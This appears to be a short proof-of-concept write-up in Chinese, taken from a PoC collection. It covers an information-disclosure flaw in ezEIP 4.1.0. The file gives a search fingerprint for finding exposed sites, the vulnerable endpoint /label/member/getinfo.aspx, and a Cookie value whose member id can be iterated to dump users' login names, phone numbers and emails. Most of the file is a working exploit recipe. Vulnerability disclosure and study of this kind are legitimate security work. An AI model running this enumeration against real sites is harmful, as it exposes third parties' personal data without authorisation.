Awesome-POC/CMS漏洞/ezEIP 4.1.0 信息泄露漏洞.md
2023-08-28 15:55:36 +08:00

33 lines
458 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# ezEIP 4.1.0 信息泄露漏洞
## 漏洞描述
ezEIP 4.1.0 存在信息泄露漏洞通过遍历Cookie中的参数值获取敏感信息
## 漏洞影响
```
ezEIP 4.1.0
```
## 网络测绘
```
"ezEIP"
```
## 漏洞复现
漏洞Url为
```plain
/label/member/getinfo.aspx
```
访问时添加Cookie通过遍历获取用户的登录名电话邮箱等信息
```plain
WHIR_USERINFOR=whir_mem_member_pid=1;
```
![](./images/202202162312106.png)